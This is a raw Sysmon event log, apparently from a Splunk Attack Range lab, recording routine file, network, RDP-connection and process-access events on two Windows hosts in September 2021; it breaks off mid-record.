Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5B18323E8E56BED048F2B1FDA55005F,SHA256=6D9DEFC1C71EE0368E6BEB1059E8283CD9B78470AD5A589E2DB330A33EF0DCE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:44.888{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53300-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:46.243{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D3E2BE4D453E24BC1CB799C963F7577,SHA256=CC5EE2B91FDDDD599B1FF048E98B6EF113BA9369DC0A1428436886CF81C59482,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.996{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89E1-6151-187A-00000000FC01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.996{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.996{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.996{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.996{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.996{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-89E1-6151-187A-00000000FC01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.996{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89E1-6151-187A-00000000FC01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.981{5EBD8912-89E1-6151-187A-00000000FC01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:45.478{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com50811-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:47.280{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AA727DC8F48B9F67C2F2C8ACFAA7464,SHA256=83455B8DF72AA5C400BFCACF691542F2EFEE573E11A1C5CC5259B24AE984C915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978019Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:47.896{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57E8D5CB365782B5D6855255EEEEB01D,SHA256=E64B597AAA2D2068593B7E52C076264624E7CA4D50D714A3D777CF7ADFBA9895,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978018Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:44.455{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62345-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001049362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:46.750{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63161-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:48.495{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0ED176D4798330060515F976E656B73A,SHA256=A2419CCCAB2ADE190C7768661CCAEEA3472D8DCC9D4C3296F5C406DF3B8B42D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:48.295{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30809D964670AC6981DE8B792DC18655,SHA256=DE3D9B1CA63BA1034242698F549F61F43DA55A06CA0083DFB551685A81EB7891,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978021Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:45.869{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59333-false10.0.1.12-8000- 23542300x8000000000000000978020Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:48.006{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFCB4B914FEF26FAE5358AEA29E4A90A,SHA256=C17CBA3750675FBBEF28C5D08282352251B6B4BF076CD262678AD494A87BB269,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:49.359{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B2D79AAD7F8240B6121FA4659C0A40,SHA256=15B05AB0E3FE2B844E6F38A2D610691895E34F4E2D18E8AF3878F0E7CC03A759,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978022Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:49.021{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6163E6F81186B1735DBDEC5388F7B9BE,SHA256=580AED5017586375766D83029F0DF4B444943FB6F0712EB985243AE56F1B98FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:49.221{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64074-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:50.840{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BAF263B55DEE653CB41C98AF6D29764D,SHA256=E7362D806FB624DAED79B7F62EA0D31502C93B93816612B412F4A6591CEE5D0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:50.378{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6367EF129DBCEEC0CF5427B9B583C818,SHA256=33919570B131BB3176F036395BBA6903A462E67C09219EE8EE5DC9A0ED11A83F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978023Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:50.037{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC16A25629B5777F185F3DD37AB27DE,SHA256=538E29E9501F501EAD7516A03FEC7D3A5D2E8F611F4EA957E731E00DE4FA29E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:51.440{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34053CEFD987CBF0D64A04406C20F810,SHA256=DBC43124DF837DF738D5978C290EB48F76CAB7360B4E4D9E93E0AB433D680AB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978024Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:51.052{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1226AB12073F56ABC64823BCB0C6CB14,SHA256=2A1913821724F832D2F154DC1F7F14AEC017BFCA9F044A140CFAD0202FC715AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:52.458{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C03034E09801D51DECFD02D16D6B414,SHA256=2D37EAED2A07D11BBD0EF7554AB6D60134E5F4BB9E0596FCADF3E5564E212D2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978025Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:52.068{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BBE9FC76D5019F81423B058DFC35BB9,SHA256=7B8326DD4EC56DC1978F988BA29D6AF999F524562F51757A43A6AE7805DBFECC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:53.478{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EED963A23E937DDE0330C63F3D97E511,SHA256=6937B6795FF3D5D6AFAF48EB97FFDF9F8CBB0A3DD9323C5FEB553AEB5BBE0805,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978026Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:53.084{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0A482B4B918A4ECD2FAE992459B272A,SHA256=7DB550A71AEE856A357FD53FDE62C3930A82FEB18B5FEBDB9B8D76B87C202ED4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.979{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.879{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=936239DBB88694AA425CC94CF2785F7B,SHA256=AFB51DC6FB97700A6F575E1C756DFB52CE5664574AE1CC66DAB9188BCF76B904,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:53.258{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de54926-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001049389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.742{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89EA-6151-1A7A-00000000FC01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.742{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.742{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.742{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.742{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.742{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89EA-6151-1A7A-00000000FC01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.742{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89EA-6151-1A7A-00000000FC01}2004C:\Program 